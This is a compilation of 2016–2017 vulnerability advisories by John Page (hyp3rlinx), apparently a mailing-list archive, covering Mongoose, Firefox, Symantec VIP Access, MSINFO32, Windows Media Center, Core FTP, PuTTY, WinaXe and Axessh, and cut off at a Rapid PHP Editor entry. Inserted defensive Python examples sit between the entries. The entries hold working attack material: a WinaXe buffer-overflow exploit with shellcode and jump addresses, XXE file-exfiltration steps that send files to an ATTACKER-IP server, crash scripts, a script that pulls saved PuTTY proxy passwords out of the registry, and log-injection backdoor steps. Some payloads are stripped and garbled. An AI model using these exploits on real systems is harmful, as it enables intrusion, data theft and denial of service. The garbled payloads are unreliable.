


Product:
==
Mongoose Web Server (Free Edition)
Mongoose-free-6.5.exe
Download: https://cesanta.com/binary.html


Mongoose - GitHub's most popular embedded web server
and multi-protocol networking library

Mongoose Embedded Web Server Library - Mongoose is more than an embedded 
webserver. It is a multi-protocol embedded networking library
with functions including TCP, HTTP client and server, WebSocket client and 
server, MQTT client and broker and much more.



Vulnerability Type:
===
CSRF - Command Execution



CVE Reference:
==
CVE-2017-11567



Security Issue:

Remote attackers who can lure a Mongoose web server user into clicking a 
malicious link or visiting an attacker-controlled web page
can execute system commands on the system hosting the Mongoose server. However, IF 
the Mongoose web server is installed as a service then
executing programs e.g. "calc.exe" may at times crash or fail to appear, but 
you may see it in Windows taskmgr.exe.
Therefore, from my tests, commands may become unstable when Mongoose is run as a 
service.

When Mongoose is run in standard mode attackers can potentially modify 
"Mongoose.conf" and create arbitrary files on the server like .PHP etc.
to point Mongoose to this as its new "index" file. Then you need to tell 
Mongoose its "access_log_file" is the new attacker-generated
file, after injecting commands into the Mongoose web server's log file that will get 
executed when the log file is later requested.

This vulnerability requires the CGI interpreter to be already set, or some 
information about the target to be known, like the CGI path and the language
"pl,php,cgi" used, so that we can set the correct programming language when the 
file is created during the initial CSRF attack.

Note: If running commands with arguments, we have to use "\t" tab chars as 
using a space will break our TELNET based code injection
to the server log.

e.g.

GET HTTP/1.1

OR just TELNET to the Mongoose web server, inject arbitrary commands, then call 
exec by making another TELNET HTTP GET.


After Command Injection "Mongoose.conf" will be:

# Mongoose web server configuration file.
# For detailed description of every option, visit
# https://github.com/cesanta/Mongoose
# Lines starting with '#' and empty lines are ignored.
# To make a change, remove leading '#', modify option's value,
# save this file and then restart Mongoose.

# access_control_list 
access_log_file C:\Mongoose.access.php <=== BOOM
# auth_domain mydomain.com
cgi_interpreter c:\xampp\php\php.exe <== MUST BE SET
# cgi_pattern **.cgi$|**.pl$|**.php$
# dav_auth_file 
# dav_root 
# debug 0
document_root C:\
# enable_directory_listing yes
# error_log_file 
# extra_headers 
# extra_mime_types 
# global_auth_file 
# hide_files_patterns 
# hexdump_file 
index_files Mongoose.access.php   < BOOM
# listening_port 8080
# run_as_user 
# ssi_pattern **.shtml$|**.shtm$
# ssl_certificate 
# ssl_ca_certificate 
# start_browser yes
# url_rewrites



Command injection into the Mongoose log file to create a backdoor.
---

2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:30 - 127.0.0.1 - GET 400 0 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 
4294967295 http://127.0.0.1:8080/__mg_admin
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET 
/__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 -
 

Tested Windows 7.



Exploit/POC:
=

1) add backdoor account POC.

http://127.0.0.1:8080/__mg_admin?save; method="post">




document.forms[0].submit()



2) TELNET x.x.x.x 8080
GET HTTP/1.1

Enter

Enter

TELNET x.x.x.x 8080
GET / HTTP/1.1

Enter

Enter

Done, backdoor added!




1) run calc.exe POC.

http://127.0.0.1:8080/__mg_admin?save; method="post">



document.forms[0].submit()


2) TELNET x.x.x.x 8080
GET / HTTP/1.1

Enter

Enter



Network Access:
===
Remote



Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: July 23, 2017
Vendor Notification: July 28, 2017
Vendor Acknowledgement: July 31, 2017
Vendor Fixed released version  6.9 : September 4, 2017
September 4, 2017 : Public Disclosure



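An added example, not Cesanta's code: a Python audit of Mongoose.conf that flags the option combination the advisory ends up with (a log file with a CGI-served extension, that log listed in index_files, cgi_interpreter set, and a drive-root document_root). Both configuration samples are constructed from the values shown above.

```python
from typing import Dict, List

# Constructed Mongoose.conf in the post-injection state the advisory shows
# (option values copied from the advisory; not a real host's file).
INJECTED_CONF = r"""
# Mongoose web server configuration file.
# access_control_list
access_log_file C:\Mongoose.access.php
# auth_domain mydomain.com
cgi_interpreter c:\xampp\php\php.exe
# cgi_pattern **.cgi$|**.pl$|**.php$
document_root C:\
index_files Mongoose.access.php
# listening_port 8080
"""

# Constructed sane configuration for comparison.
SANE_CONF = r"""
access_log_file C:\mongoose\logs\access.log
document_root C:\mongoose\htdocs
index_files index.html,index.htm
# cgi_interpreter not set
"""

SCRIPT_EXTS = (".php", ".cgi", ".pl", ".py", ".lsp")


def parse_mongoose_conf(text: str) -> Dict[str, str]:
    """Return {option: value} for non-comment lines (last occurrence wins)."""
    opts: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        opts[parts[0]] = parts[1].strip() if len(parts) > 1 else ""
    return opts


def audit_mongoose_conf(text: str) -> List[str]:
    """Flag the settings that turn the access log into a web shell.

    The chain needs all of: a log file named with a CGI-served extension,
    the log served as an index file, a CGI interpreter to run it, and a
    document root wide enough to reach it. Each part is reported on its
    own, so a partially prepared host is still visible.
    """
    opts = parse_mongoose_conf(text)
    findings = []
    log = opts.get("access_log_file", "")
    log_name = log.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if log_name.endswith(SCRIPT_EXTS):
        findings.append("access_log_file has a CGI-served extension: %s" % log)
    index = [i.strip().lower() for i in opts.get("index_files", "").split(",") if i.strip()]
    if log_name and log_name in index:
        findings.append("index_files references the access log: %s" % log_name)
    if "cgi_interpreter" in opts and log_name.endswith(SCRIPT_EXTS):
        findings.append("cgi_interpreter is set, so the log would execute: %s" % opts["cgi_interpreter"])
    root = opts.get("document_root", "").rstrip("\\/")
    if len(root) == 2 and root[1] == ":":
        findings.append("document_root is a drive root (%s), exposing the whole drive" % opts["document_root"])
    return findings


if __name__ == "__main__":
    for label, conf in (("injected", INJECTED_CONF), ("sane", SANE_CONF)):
        print(label, audit_mongoose_conf(conf) or "clean")
```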

Firefox v54.0.1 Denial Of Service

2017-07-07 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/FIREFOX-v54.0.1-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
 


Vendor:
===
www.mozilla.org



Product:
===
Firefox v54.0.1



Vulnerability Type:
===
Denial Of Service



Security Issue:

Dynamically creating HTML elements IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA 
and assigning a very long string of junk chars to the
"style.color" property results in a Firefox Browser out of memory crash (not a tab 
crash).

Tested on Windows 7

References:
https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288


Exploit/POC:
=




var p1 = "\x41";
for (var c=0;c<0xC350;c++){
p1+="\x41";
}
var p2="\x41";
for (c=0;c<0x1388;c++){
p2 += p1;
}
var el = document.createElement('img')  //FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA 
 //<=== OR any of these elements.
el.style.color=p2
document.body.appendChild(el)
  






Network Access:
===
Remote



Severity:
=
Medium




Disclosure Timeline:
=
Vendor Notification: June 27, 2017
July 7, 2017  : Public Disclosure




hyp3rlinx


Symantec VIP Access Desktop Arbitrary DLL Execution

2016-12-08 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/SYMANTEC-VIP-ACCESS-ARBITRARY-DLL-EXECUTION.txt

[+] ISR: ApparitionSec



Vendor:

www.symantec.com



Product:
===
Symantec VIP Access
Desktop versions prior to 2.2.2


Vulnerability Type:
===
Arbitrary DLL Execution



CVE Reference:
==
CVE-2016-6593



Vulnerability Details:
=

VIP Access Desktop UI Manager invokes DLLs from the current working folder 
during startup. A malicious local user can create
specifically modified DLLs to replace the normal product DLLs required during 
startup.

Then, by redirecting the startup path of the VIP Access Desktop UI Manager the 
user can cause the VIP Access Desktop
UI Manager to invoke the substituted DLL instead of the required product DLL. 
Any specifically modified code execution
could be performed with logged-on user privileges, which is normally user-level 
access in currently supported operating systems.
Ultimately, this problem is caused by a failure to properly validate required 
product DLLs during start-up.

This could result in a local user being able to manipulate VIP Access Desktop 
to load and execute an arbitrary DLL of the user’s
choice with user-level privileges.

Reference:
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20161208_00



Disclosure Timeline:
==
Vendor Notification:  February 4, 2016
December 8, 2016  : Public Disclosure




Exploitation Technique:
===
Local





hyp3rlinx


Microsoft MSINFO32.EXE ".NFO" Files XML External Entity

2016-12-05 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt

[+] ISR: ApparitionSec



Vendor:
=
www.microsoft.com



Product:
==
Windows System Information
MSINFO32.exe v6.1.7601


Windows MSINFO32.EXE displays a comprehensive view of your hardware, system 
components, and software environment.

Parameters
FileName   : Specifies the file to be opened. This can be an .nfo, .xml, .txt, 
or .cab file.



Vulnerability Type:
===
XML External Entity



CVE Reference:
==
N/A



Vulnerability Details:
=

Microsoft Windows MSINFO32.exe is vulnerable to an XML External Entity attack 
which can potentially allow remote attackers to 
gain access to and exfiltrate files from the victim's computer if they open a 
malicious ".nfo" file via remote share / USB etc.

Upon opening the file the user will see an error message like "System Information is 
unable to open this .nfo file. The file might
be corrupt" etc.


Tested Windows 7 SP1


Exploit code(s):
===

Access and exfiltrate Windows "msdfmap.ini" file as trivial POC.
This file contains credentials for MS ADO Remote Data Services.


1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd)



2) "payload.dtd"



http://attacker-ip:8080?%file;'>">

%all;



3) "FindMeThatBiatch.nfo" (corrupt .NFO file)



http://attacker-ip:8080/payload.dtd;>
%dtd;]>




Double click to open FindMeThatBiatch.nfo, the user gets an error, MSINFO32 opens... 
attacker gets files.

OR open via Windows CL:
c:\>msinfo32  \\REMOTE-SHARE\FindMeThatBiatch.nfo



Disclosure Timeline:
==
Vendor Notification: September 4, 2016
Vendor Reply "not meet the bar for security servicing": September 7, 2016
December 4, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High





hyp3rlinx


Microsoft Windows Media Center "ehshell.exe" XML External Entity

2016-12-05 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MEDIA-CENTER-XXE-FILE-DISCLOSURE.txt

[+] ISR: ApparitionSec



Vendor:
==
www.microsoft.com



Product:
==
Windows Media Center "ehshell.exe"
version 6.1.7600



Vulnerability Type:

XML External Entity 



CVE Reference:
==
N/A



Vulnerability Details:
=

Windows Media Center "ehshell.exe" is vulnerable to an XML External Entity attack 
allowing remote access to ANY files on a victim's computer, if they open
an XXE laden ".mcl" file via a remote share / USB or from a malicious 
"windowsmediacenterweb" web link.

Sometimes 'Windows Media Center' will crash, sometimes it opens normally and other 
times it will not open, but the files get accessed and exfiltrated.


Tested Windows 7 SP1



Exploit code(s):
===

POC exfiltrate "msdfmap.ini" used by MS ADO Remote Data Services.


1) ATTACKER-IP listener  
python -m SimpleHTTPServer 8080



2) Create the "FindMeThatBiotch.dtd" DTD file with the below contents (host on 
ATTACKER-IP in the directory where the python server is listening)

http://ATTACKER-IP:8080/%data666;'>">



3) Create the "EVIL.mcl" file.




http://ATTACKER-IP:8080/FindMeThatBiotch.dtd;>
%junk;
%param666;
%FindMeThatBiotch;
]>



4) Get victim to open the EVIL.mcl ... enjoy your files!

OR create link on webpage to run the file, but "user has to consent first".

XXE POC



Disclosure Timeline:
===
Vendor Notification:  September 1, 2016
Vendor opens Case 34970: September 6, 2016
Vendor reply "Wont Fix" : October 19, 2016
December 4, 2016 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High





hyp3rlinx
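An added example covering both this advisory and the MSINFO32 ".nfo" one above (not Microsoft's code and not the author's payloads): a Python scanner that lists DOCTYPE-level external references in an XML file, which is the precondition both attacks rely on, so a mail gateway or file share monitor can quarantine .nfo/.mcl files that carry them. The sample documents are constructed.

```python
import re
from typing import Dict, List

# Constructed samples, not the payloads from either advisory (those were
# stripped from the posts). BENIGN_NFO is a harmless .nfo; SUSPECT_NFO
# carries the external parameter entity both advisories hinge on, pointing
# at an attacker-hosted DTD; SUSPECT_MCL declares a general entity over file://.
BENIGN_NFO = """<?xml version="1.0"?>
<MsInfo><Category name="System Summary"/></MsInfo>
"""

SUSPECT_NFO = """<?xml version="1.0"?>
<!DOCTYPE MsInfo [
  <!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
  %dtd;
]>
<MsInfo/>
"""

SUSPECT_MCL = """<?xml version="1.0"?>
<!DOCTYPE application [
  <!ENTITY junk SYSTEM "file:///C:/Windows/msdfmap.ini">
]>
<application url="placeholder"/>
"""

# <!DOCTYPE name SYSTEM "uri"> or <!DOCTYPE name PUBLIC "id" "uri">
DOCTYPE_EXT_RE = re.compile(
    r"""<!DOCTYPE\s+[^\s\[>]+\s+(SYSTEM|PUBLIC)\s+(?:(?:"[^"]*"|'[^']*')\s+)?(?:"([^"]*)"|'([^']*)')""",
    re.IGNORECASE)
# <!ENTITY [%] name SYSTEM "uri"> or <!ENTITY [%] name PUBLIC "id" "uri">
ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(%\s+)?([^\s>]+)\s+(SYSTEM|PUBLIC)\s+(?:(?:"[^"]*"|'[^']*')\s+)?(?:"([^"]*)"|'([^']*)')""",
    re.IGNORECASE)
REMOTE_SCHEMES = ("http", "https", "ftp")


def _finding(kind: str, name: str, uri: str) -> Dict[str, str]:
    scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
    return {"kind": kind, "name": name, "uri": uri, "scheme": scheme}


def scan_external_references(xml_text: str) -> List[Dict[str, str]]:
    """List DOCTYPE-level references to resources outside the document.

    .nfo and .mcl files are XML, so one check serves both. Each finding is
    an external DTD subset, an external parameter entity, or an external
    general entity; `scheme` separates a network fetch (http, ftp) from a
    local read (file:// or a bare path).
    """
    findings = []
    m = DOCTYPE_EXT_RE.search(xml_text)
    if m:
        uri = m.group(2) if m.group(2) is not None else m.group(3)
        findings.append(_finding("doctype-external-subset", "", uri))
    for m in ENTITY_RE.finditer(xml_text):
        kind = "parameter-entity" if m.group(1) else "general-entity"
        uri = m.group(4) if m.group(4) is not None else m.group(5)
        findings.append(_finding(kind, m.group(2), uri))
    return findings


def is_xxe_suspect(xml_text: str) -> bool:
    """A system-information or media-center file has no business pulling
    in anything external; any such reference is enough to quarantine it."""
    return bool(scan_external_references(xml_text))


def exfil_targets(xml_text: str) -> List[str]:
    """URIs a resolving parser would contact over the network for this file."""
    return [f["uri"] for f in scan_external_references(xml_text)
            if f["scheme"] in REMOTE_SCHEMES]


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_NFO), ("nfo", SUSPECT_NFO), ("mcl", SUSPECT_MCL)):
        print(label, is_xxe_suspect(doc), scan_external_references(doc))
```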


Core FTP LE v2.2 Remote SSH/SFTP Buffer Overflow

2016-11-28 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec



Vendor:
===
www.coreftp.com



Product:

Core FTP LE (client)
v2.2 build 1883 

Core FTP LE - free Windows software that includes the client FTP features you 
need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and drop 
support, file viewing & editing, firewall support,
custom commands, FTP URL parsing, command line transfers, filters, and much, 
much more.



Vulnerability Type:

Remote SSH/SFTP Buffer Overflow 



CVE Reference:
==
N/A



Vulnerability Details:
=

Core FTP client is vulnerable to a remote buffer overflow denial of service when
connecting to a malicious server using the SSH/SFTP protocol.

Upon receiving an overly long string of junk in the malicious server's response,
Core FTP crashes and the stack is corrupted, with several registers (EBX, EDX, EDI)
being overwritten as can be seen below.

WinDbg dump...

(d9c.16d8): Access violation - code c005 (first/second chance not available)
eax=035b ebx=4141 ecx=03ac7e40 edx=41414141 esi=03ac7e38 edi=41414141
eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0 nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010216
ntdll!RtlImageNtHeader+0x92f:
77313ac3 8b12            mov     edx,dword ptr [edx]  ds:002b:41414141=




Exploit code(s):
===

import socket

# Core FTP SSH/SFTP Remote Buffer Overflow / DoS PoC: a fake server that
# answers every incoming connection with one overly long line of junk.
print('hyp3rlinx - Apparition Security')
print('Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n')
host = '127.0.0.1'

port = 22
s = socket.socket()

payload = b"A" * 77500          # bytes so the script runs under Python 3 as well
s.bind((host, port))
s.listen(5)

print('Listening on port... %i' % port)
print('Connect to me!')

while True:
    conn, addr = s.accept()
    conn.send(payload + b'\r\n')
    conn.close()



Exploitation Technique:
===
Remote



Severity Level:
===
High





hyp3rlinx


Putty Cleartext Password Storage

2016-11-21 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PUTTY.EXE-INSECURE-PASSWORD-STORAGE.txt

[+] ISR: ApparitionSec



Vendor:
==
www.chiark.greenend.org.uk



Product:
===
Putty.exe
v0.67

PuTTY is a free and open-source terminal emulator, serial console and network 
file transfer application. It supports several
network protocols, including SCP, SSH, Telnet, rlogin, and raw socket 
connection.



Vulnerability Type:
==
Cleartext Password Storage



Vulnerability Details:
=

Putty.exe stores passwords unencrypted for sessions that use a Proxy connection
and specify a password to save.

Putty saves sessions in the Windows registry and the passwords are stored in cleartext.
By storing the passwords in the clear
it can put the Proxy server at risk if the system running Putty is compromised.

A casual Putty user may not be aware of how and where passwords are stored and
may assume that saving passwords is safe,
as Putty does NOT warn the user that saved Proxy passwords are stored in
cleartext in the registry.


1) Create and save a Putty session specifying a Proxy for the connection, enter 
a password and save it.


2) Run the below 'Putty-Insecure-PWD.bat' script to search registry for saved 
session passwords. 


"Putty-Insecure-PWD.bat"
---

@echo off

setlocal ENABLEEXTENSIONS
set /p v1=Enter Putty Saved Session: %1

echo Search registry for %v1% session Putty password?

pause

set KEY_NAME=HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\%v1%
set VALUE_NAME=ProxyPassword

rem REG QUERY prints "    ProxyPassword    REG_SZ    <value>"; tokens=1,2,* keeps
rem the whole value in %%C even when the password itself contains spaces.
rem The key path is quoted so session names containing spaces still work.
FOR /F "tokens=1,2,*" %%A IN ('REG QUERY "%KEY_NAME%" /v %VALUE_NAME% 2^>nul') DO (
set ValueName=%%A
set ValueType=%%B
set ValueValue=%%C
)

if defined ValueName (
@echo Value Name = %ValueName%
@echo Value Type = %ValueType%
@echo Value Password = %ValueValue%

) else (
@echo %KEY_NAME%\%VALUE_NAME% not found.
)

set "v1="


End BAT script/

e.g. output when run BAT file:

Value Name = ProxyPassword
Value Type = REG_SZ
Value Password = abc123
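Added audit example (not part of the advisory, and not PuTTY's own code): the batch
script above checks one session at a time; this Python script walks every saved session
under HKCU and reports which ones carry a cleartext ProxyPassword, without printing the
password itself. The registry path and value names are the ones named in the advisory;
the sample session data and all function names are my own constructions.

```python
from urllib.parse import unquote


def audit_sessions(sessions):
    """Flag saved sessions that carry a proxy password in the clear.

    `sessions` maps session name -> {registry value name: value}, the shape
    load_sessions_from_registry() produces. The password itself is never
    returned, only its presence and length.
    """
    flagged = []
    for name, values in sessions.items():
        pw = values.get("ProxyPassword", "")
        if isinstance(pw, str) and pw:
            flagged.append({
                "session": name,
                "proxy_host": values.get("ProxyHost", ""),
                "proxy_user": values.get("ProxyUsername", ""),
                "password_length": len(pw),
            })
    return flagged


def load_sessions_from_registry():
    """Read every PuTTY session under HKCU (Windows only; uses the winreg module)."""
    import winreg
    base = r"Software\SimonTatham\PuTTY\Sessions"
    sessions = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, base) as root:
        i = 0
        while True:
            try:
                sub = winreg.EnumKey(root, i)
            except OSError:            # no more subkeys
                break
            i += 1
            values = {}
            with winreg.OpenKey(root, sub) as key:
                j = 0
                while True:
                    try:
                        vname, vdata, _ = winreg.EnumValue(key, j)
                    except OSError:    # no more values
                        break
                    j += 1
                    values[vname] = vdata
            # PuTTY percent-encodes characters it cannot use in a key name.
            sessions[unquote(sub)] = values
    return sessions


# Constructed sample in the same shape as the registry data (not real sessions).
SAMPLE_SESSIONS = {
    "jump host": {"HostName": "jump.example.test", "ProxyHost": "proxy.example.test",
                  "ProxyUsername": "svc", "ProxyPassword": "abc123"},
    "plain": {"HostName": "plain.example.test", "ProxyPassword": ""},
    "noproxy": {"HostName": "other.example.test"},
}


if __name__ == "__main__":
    import sys
    data = load_sessions_from_registry() if sys.platform == "win32" else SAMPLE_SESSIONS
    for finding in audit_sessions(data):
        print("session %(session)r stores a %(password_length)d-char proxy "
              "password for %(proxy_user)s@%(proxy_host)s" % finding)
```

On Windows the script reads the live registry; elsewhere it runs against the constructed sample so the reporting logic can be exercised anywhere.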

OR manually open regedit and ctrl+F to find 'SimonTatham' then find your 
session Key you saved.

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\

Next, find String Name 'ProxyPassword' and double click to open

value name:
ProxyPassword

Value data:





hyp3rlinx


WinaXe v7.7 FTP 'Server Ready' CMD Remote Buffer Overflow

2016-11-08 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt

[+] ISR: Apparition Security



Vendor:

www.labf.com



Product:

WinaXe v7.7 FTP 

The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built 
and provided in the package.
All that you need to run remote UNIX and X Applications is included within 
WinaXe Plus. You operate simultaneously with
X11, FTP and Telnet sessions and with your familiar MS Windows applications.



Vulnerability Type:
===
Remote Buffer Overflow



Vulnerability Details:
==

WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors
when connecting to a malicious FTP server and
receiving overly long payloads in the command response from the remote server.

220 SERVICE READY 
331 USER / PASS
200 TYPE
257 PWD

etc...

Below is the POC for the "server ready" 220 command exploit, triggered when first
connecting to an FTP server.
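Added defensive example (not part of this advisory, the Core FTP advisory above, or
either vendor's code): both clients crash because an overly long server reply is copied
before its length is checked. The Python below shows the other order, a bounded
reader for FTP reply lines (RFC 959 format: three-digit code, space or hyphen, text)
that rejects a line as soon as it exceeds a fixed limit and never buffers an
unterminated line without bound. MAX_REPLY_LINE, the sample replies and all function
names are my own choices.

```python
import re

# Upper bound on one reply line. RFC 959 sets no hard limit, so the client
# has to choose one; 512 bytes is ample for real servers and far below the
# 2000+ byte junk lines that crash the clients in these advisories.
MAX_REPLY_LINE = 512

# "<3-digit code><space or hyphen><text>"; a hyphen opens a multi-line reply.
_REPLY_RE = re.compile(rb"^([1-5][0-9]{2})([ -])(.*)$")


class FtpReplyError(ValueError):
    """The server sent something this client refuses to process."""


def _check_raw_line(raw: bytes) -> bytes:
    """Length/format gate applied before a line is handed to any parser.

    The vulnerable clients copy the line into a fixed buffer first and
    look at it afterwards; here the size check comes first.
    """
    if len(raw) > MAX_REPLY_LINE:
        raise FtpReplyError(
            f"reply line of {len(raw)} bytes exceeds {MAX_REPLY_LINE}")
    if not raw.endswith(b"\r\n"):
        raise FtpReplyError("reply line is not CRLF-terminated")
    body = raw[:-2]
    if any(b < 0x20 and b != 0x09 for b in body) or 0x7F in body:
        raise FtpReplyError("control characters in reply line")
    return body


def parse_reply_line(raw: bytes):
    """Split one validated line into (code, is_final, text)."""
    body = _check_raw_line(raw)
    m = _REPLY_RE.match(body)
    if m is None:
        raise FtpReplyError(f"malformed reply line: {body[:32]!r}")
    code, sep, text = m.groups()
    return int(code), sep == b" ", text.decode("ascii", errors="replace")


def read_reply(stream: bytes):
    """Consume one complete reply (single or multi-line) from `stream`.

    Returns (code, [text lines], unconsumed bytes). An unterminated line
    is rejected as soon as it passes the limit, so a server that never
    sends CRLF cannot make the client buffer without bound.
    """
    rest, code, texts = stream, None, []
    while True:
        nl = rest.find(b"\r\n")
        if nl == -1:
            if len(rest) > MAX_REPLY_LINE:
                raise FtpReplyError("unterminated reply line exceeds limit")
            raise FtpReplyError("incomplete reply")
        raw, rest = rest[:nl + 2], rest[nl + 2:]
        if code is None:                       # first line sets the code
            code, final, text = parse_reply_line(raw)
        else:                                  # inside a multi-line reply
            body = _check_raw_line(raw)
            m = _REPLY_RE.match(body)
            if m and int(m.group(1)) == code and m.group(2) == b" ":
                final, text = True, m.group(3).decode("ascii", "replace")
            else:                              # RFC 959: any text continues the reply
                final, text = False, body.decode("ascii", "replace")
        texts.append(text)
        if final:
            return code, texts, rest


def reply_is_acceptable(stream: bytes) -> bool:
    """Convenience wrapper: True if `stream` holds a reply this client accepts."""
    try:
        read_reply(stream)
        return True
    except FtpReplyError:
        return False


if __name__ == "__main__":
    # Constructed inputs: a normal banner and an overlong one of the kind described above.
    print(read_reply(b"220 Service ready\r\n"))
    print(reply_is_acceptable(b"220" + b"A" * 2200 + b"\r\n"))
```

The same ordering (bound first, copy second) is what a native client needs in its receive loop; the Python only makes the check explicit.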


Exploit code(s):
===

import socket,struct

#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


eip=struct.pack('<L',0x68084A6F)#POP ECX RET 
jmpesp=struct.pack('<L',0x68017296) #JMP ESP

#We will do POP ECX RET and place a JMP ESP address at the RET address that 
will jump to shellcode.

payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20 #Server Ready '220' Exploit

port = 21   
s = socket.socket()
host = '127.0.0.1'  
s.bind((host, port))
s.listen(5)

print 'Evil FTPServer listening...'

while True:
    conn, addr = s.accept() 
    conn.send('220'+payload+'\r\n')
    conn.close()





Exploitation Technique:
===
Remote



Severity Level:

High




hyp3rlinx


Axessh 4.2.2 Denial Of Service

2016-11-08 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt

[+] ISR: ApparitionSec



Vendor:

www.labf.com



Product:
=
Axessh 4.2.2

Axessh is an SSH client. It is a superb terminal emulator/telnet client for 
Windows. It provides SSH capabilities to Axessh without
sacrificing any existing functionality. Furthermore, Axessh has been 
developed entirely outside of the USA, and can be sold
anywhere in the world (apart from places where people aren't allowed to own 
cryptographic software).

2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, 
AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection 
forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested 
port forwarding 



Vulnerability Type:

Denial Of Service

AxeSSH will crash after receiving an overly long payload of junk...



Exploit code(s):
===

1) Open the settings window for axessh and choose Run, then click Run as EXE;
this will launch "xwpsshd.exe", which crashes with a bad protocol version
when sent the payload.


import socket

print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"

ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)



Exploitation Technique:
===
Remote



Severity Level:

Medium




hyp3rlinx


Rapid PHP Editor CSRF Remote Command Execution

2016-11-08 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/RAPID-PHP-EDITOR-REMOTE-CMD-EXEC.txt

[+] ISR: Apparition Security



Vendor:
==
www.rapidphpeditor.com



Product:
===
Rapid PHP Editor IDE
rapidphp2016.exe v14.1


Rapid PHP editor is a faster and more powerful PHP editor for Windows combining 
features of a fully-packed PHP IDE with 
the speed of the Notepad. Rapid PHP is the most complete all-in-one software 
for coding PHP, HTML, CSS, JavaScript and
other web development languages with tools for debugging, validating, reusing, 
navigating and formatting your code.



Vulnerability Type:
=
